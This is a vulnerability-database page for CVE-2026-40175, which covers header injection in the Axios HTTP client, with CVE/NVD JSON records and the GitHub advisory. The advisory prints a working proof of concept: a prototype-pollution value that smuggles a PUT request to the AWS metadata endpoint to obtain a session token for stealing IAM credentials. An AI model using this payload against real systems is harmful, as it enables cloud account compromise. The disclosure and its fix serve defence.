CVE-2026-40175 (GCVE-0-2026-40175)

Vulnerability from cvelistv5 – Published: 2026-04-10 19:23 – Updated: 2026-04-14 15:21

Title

Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

Summary

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/axios/axios/security/advisorie…	x_refsource_CONFIRM
	https://github.com/axios/axios/pull/10660	x_refsource_MISC
	https://github.com/axios/axios/pull/10688	x_refsource_MISC
	https://github.com/axios/axios/commit/03cdfc99e8d…	x_refsource_MISC
	https://github.com/axios/axios/commit/363185461b9…	x_refsource_MISC
	https://github.com/axios/axios/releases/tag/v0.31.0	x_refsource_MISC
	https://github.com/axios/axios/releases/tag/v1.15.0	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	axios	axios	Affected: >= 1.0.0, < 1.15.0 Affected: < 0.31.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2026-04-13T09:32:22.149Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://github.com/axios/axios/pull/10660#issuecomment-4224168081"
          }
        ],
        "title": "CVE Program Container",
        "x_generator": {
          "engine": "ADPogram 0.0.1"
        }
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40175",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-14T03:55:46.495918Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-14T13:28:31.579Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "axios",
          "vendor": "axios",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0.0, \u003c 1.15.0"
            },
            {
              "status": "affected",
              "version": "\u003c 0.31.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-113",
              "description": "CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-444",
              "description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-14T15:21:10.467Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"
        },
        {
          "name": "https://github.com/axios/axios/pull/10660",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/axios/axios/pull/10660"
        },
        {
          "name": "https://github.com/axios/axios/pull/10688",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/axios/axios/pull/10688"
        },
        {
          "name": "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"
        },
        {
          "name": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"
        },
        {
          "name": "https://github.com/axios/axios/releases/tag/v0.31.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/axios/axios/releases/tag/v0.31.0"
        },
        {
          "name": "https://github.com/axios/axios/releases/tag/v1.15.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
        }
      ],
      "source": {
        "advisory": "GHSA-fvcv-3m26-pcqx",
        "discovery": "UNKNOWN"
      },
      "title": "Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40175",
    "datePublished": "2026-04-10T19:23:52.285Z",
    "dateReserved": "2026-04-09T20:59:17.618Z",
    "dateUpdated": "2026-04-14T15:21:10.467Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40175",
      "date": "2026-04-15",
      "epss": "0.00403",
      "percentile": "0.60949"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40175\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-10T20:16:22.800\",\"lastModified\":\"2026-04-14T16:16:47.637\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \\\"Gadget\\\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-113\"},{\"lang\":\"en\",\"value\":\"CWE-444\"},{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/pull/10660\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/pull/10688\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/releases/tag/v0.31.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/releases/tag/v1.15.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/pull/10660#issuecomment-4224168081\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/axios/axios/pull/10660#issuecomment-4224168081\"}], \"x_generator\": {\"engine\": \"ADPogram 0.0.1\"}, \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2026-04-13T09:32:22.149Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40175\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-14T03:55:46.495918Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-13T16:11:50.913Z\"}}], \"cna\": {\"title\": \"Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\", \"source\": {\"advisory\": \"GHSA-fvcv-3m26-pcqx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 10, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"axios\", \"product\": \"axios\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0, \u003c 1.15.0\"}, {\"status\": \"affected\", \"version\": \"\u003c 0.31.0\"}]}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx\", \"name\": \"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/axios/axios/pull/10660\", \"name\": \"https://github.com/axios/axios/pull/10660\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/pull/10688\", \"name\": \"https://github.com/axios/axios/pull/10688\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c\", \"name\": \"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1\", \"name\": \"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/releases/tag/v0.31.0\", \"name\": \"https://github.com/axios/axios/releases/tag/v0.31.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/releases/tag/v1.15.0\", \"name\": \"https://github.com/axios/axios/releases/tag/v1.15.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \\\"Gadget\\\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-113\", \"description\": \"CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-444\", \"description\": \"CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-14T15:21:10.467Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40175\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-14T15:21:10.467Z\", \"dateReserved\": \"2026-04-09T20:59:17.618Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-10T19:23:52.285Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

MSRC_CVE-2026-40175

Vulnerability from csaf_microsoft - Published: 2026-04-02 00:00 - Updated: 2026-04-15 01:05

Summary

Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

Notes

Additional Resources: To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle

Disclaimer: The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2026-40175

CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')

References

URL

FKIE_CVE-2026-40175

Vulnerability from fkie_nvd - Published: 2026-04-10 20:16 - Updated: 2026-04-14 16:16

Severity ?

10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
	security-advisories@github.com	https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
	security-advisories@github.com	https://github.com/axios/axios/pull/10660
	security-advisories@github.com	https://github.com/axios/axios/pull/10688
	security-advisories@github.com	https://github.com/axios/axios/releases/tag/v0.31.0
	security-advisories@github.com	https://github.com/axios/axios/releases/tag/v1.15.0
	security-advisories@github.com	https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/axios/axios/pull/10660#issuecomment-4224168081

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1."
    }
  ],
  "id": "CVE-2026-40175",
  "lastModified": "2026-04-14T16:16:47.637",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-10T20:16:22.800",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/pull/10660"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/pull/10688"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/releases/tag/v0.31.0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/axios/axios/pull/10660#issuecomment-4224168081"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-113"
        },
        {
          "lang": "en",
          "value": "CWE-444"
        },
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-FVCV-3M26-PCQX

Vulnerability from github – Published: 2026-04-10 19:47 – Updated: 2026-04-14 15:20

Summary

Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

Details

Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

Summary

The Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass).

While Axios patches exist for preventing check pollution, the library remains vulnerable to being used as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.

Severity: Critical (CVSS 9.9) Affected Versions: All versions (v0.x - v1.x) Vulnerable Component: lib/adapters/http.js (Header Processing)

Usage of "Helper" Vulnerabilities

This vulnerability is unique because it requires Zero Direct User Input. If an attacker can pollute Object.prototype via any other library in the stack (e.g., qs, minimist, ini, body-parser), Axios will automatically pick up the polluted properties during its config merge.

Because Axios does not sanitise these merged header values for CRLF (\r\n) characters, the polluted property becomes a Request Smuggling payload.

Proof of Concept

1. The Setup (Simulated Pollution)

Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:

Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";

2. The Gadget Trigger (Safe Code)

The application makes a completely safe, hardcoded request:

// This looks safe to the developer
await axios.get('https://analytics.internal/pings');

3. The Execution

Axios merges the prototype property x-amz-target into the request headers. It then writes the header value directly to the socket without validation.

Resulting HTTP traffic:

GET /pings HTTP/1.1
Host: analytics.internal
x-amz-target: dummy

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

GET /ignore HTTP/1.1
...

4. The Impact (IMDSv2 Bypass)

The "Smuggled" second request is a valid PUT request to the AWS Metadata Service. It includes the required X-aws-ec2-metadata-token-ttl-seconds header (which a normal SSRF cannot send). The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.

Impact Analysis

Security Control Bypass: Defeats AWS IMDSv2 (Session Tokens).
Authentication Bypass: Can inject headers (Cookie, Authorization) to pivot into internal administrative panels.
Cache Poisoning: Can inject Host headers to poison shared caches.

Recommended Fix

Validate all header values in lib/adapters/http.js and xhr.js before passing them to the underlying request function.

Patch Suggestion:

// In lib/adapters/http.js
utils.forEach(requestHeaders, function setRequestHeader(val, key) {
  if (/[\r\n]/.test(val)) {
    throw new Error('Security: Header value contains invalid characters');
  }
  // ... proceed to set header
});

References

OWASP: CRLF Injection (CWE-113)

This report was generated as part of a security audit of the Axios library.

Severity ?

10.0 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.15.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40175"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113",
      "CWE-444",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T19:47:16Z",
    "nvd_published_at": "2026-04-10T20:16:22Z",
    "severity": "CRITICAL"
  },
  "details": "# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n\n## Summary\nThe Axios library is vulnerable to a specific \"Gadget\" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).\n\nWhile Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.\n\n**Severity**: Critical (CVSS 9.9)\n**Affected Versions**: All versions (v0.x - v1.x)\n**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)\n\n## Usage of \"Helper\" Vulnerabilities\nThis vulnerability is unique because it requires **Zero Direct User Input**.\nIf an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.\n\nBecause Axios does not sanitise these merged header values for CRLF (`\\r\\n`) characters, the polluted property becomes a **Request Smuggling** payload.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\nImagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:\n```javascript\nObject.prototype[\u0027x-amz-target\u0027] = \"dummy\\r\\n\\r\\nPUT /latest/api/token HTTP/1.1\\r\\nHost: 169.254.169.254\\r\\nX-aws-ec2-metadata-token-ttl-seconds: 21600\\r\\n\\r\\nGET /ignore\";\n```\n\n### 2. The Gadget Trigger (Safe Code)\nThe application makes a completely safe, hardcoded request:\n```javascript\n// This looks safe to the developer\nawait axios.get(\u0027https://analytics.internal/pings\u0027); \n```\n\n### 3. The Execution\nAxios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.\n\n**Resulting HTTP traffic:**\n```http\nGET /pings HTTP/1.1\nHost: analytics.internal\nx-amz-target: dummy\n\nPUT /latest/api/token HTTP/1.1\nHost: 169.254.169.254\nX-aws-ec2-metadata-token-ttl-seconds: 21600\n\nGET /ignore HTTP/1.1\n...\n```\n\n### 4. The Impact (IMDSv2 Bypass)\nThe \"Smuggled\" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).\nThe Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.\n\n## Impact Analysis\n-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).\n-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.\n-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.\n\n## Recommended Fix\nValidate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.\n\n**Patch Suggestion:**\n```javascript\n// In lib/adapters/http.js\nutils.forEach(requestHeaders, function setRequestHeader(val, key) {\n  if (/[\\r\\n]/.test(val)) {\n    throw new Error(\u0027Security: Header value contains invalid characters\u0027);\n  }\n  // ... proceed to set header\n});\n```\n\n## References\n-   **OWASP**: CRLF Injection (CWE-113)\n\nThis report was generated as part of a security audit of the Axios library.",
  "id": "GHSA-fvcv-3m26-pcqx",
  "modified": "2026-04-14T15:20:19Z",
  "published": "2026-04-10T19:47:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/pull/10660"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/pull/10660#issuecomment-4224168081"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/pull/10688"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v0.31.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40175 (GCVE-0-2026-40175)

MSRC_CVE-2026-40175

FKIE_CVE-2026-40175

GHSA-FVCV-3M26-PCQX

Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

Summary

Usage of "Helper" Vulnerabilities

Proof of Concept

1. The Setup (Simulated Pollution)

2. The Gadget Trigger (Safe Code)

3. The Execution

4. The Impact (IMDSv2 Bypass)

Impact Analysis

Recommended Fix

References

Tags

Sightings

Nomenclature